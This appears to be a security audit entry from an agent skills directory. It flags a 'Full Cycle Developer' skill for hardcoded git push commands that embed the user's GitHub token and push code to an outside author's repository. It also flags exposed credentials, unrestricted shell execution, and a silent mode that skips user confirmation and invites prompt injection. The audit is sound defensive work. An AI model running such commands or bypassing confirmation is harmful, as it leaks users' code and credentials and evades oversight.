The Agent Skills Directory

[DATA_EXFILTRATION]: The orchestration templates in SKILL.md and examples/python-project.md include hardcoded git push commands targeting the account KoshelevDV on GitHub (e.g., git push https://KoshelevDV:$(gh auth token)@github.com/KoshelevDV/<repo>.git). If not manually updated by the user, this logic will cause the agent to exfiltrate private source code to an external repository under the author's control.
[CREDENTIALS_UNSAFE]: The skill retrieves the user's GitHub authentication token using $(gh auth token) and interpolates it directly into shell command strings. This practice exposes sensitive credentials in cleartext within the process environment and command-line arguments.
[COMMAND_EXECUTION]: The orchestrator spawns subagents with instructions to execute arbitrary shell commands for building, testing, and linting code. The SKILL.md also contains logic for the main session to directly execute commands like git push and gh pr create using system-level tools.
[PROMPT_INJECTION]: The skill implements a "silent orchestration" protocol that directs the agent to suppress feedback and bypass standard user confirmation steps between the development, review, and fix stages. This lack of transparency increases the risk that malicious instructions or errors will propagate through the pipeline undetected. Additionally, the skill processes external project data and instructions without explicit boundary markers or sanitization, exposing it to indirect prompt injection across the multi-stage pipeline (Ingestion points: project code and documentation; Boundary markers: absent; Capability inventory: shell execution, file modification, network operations; Sanitization: absent).

Full Cycle Developer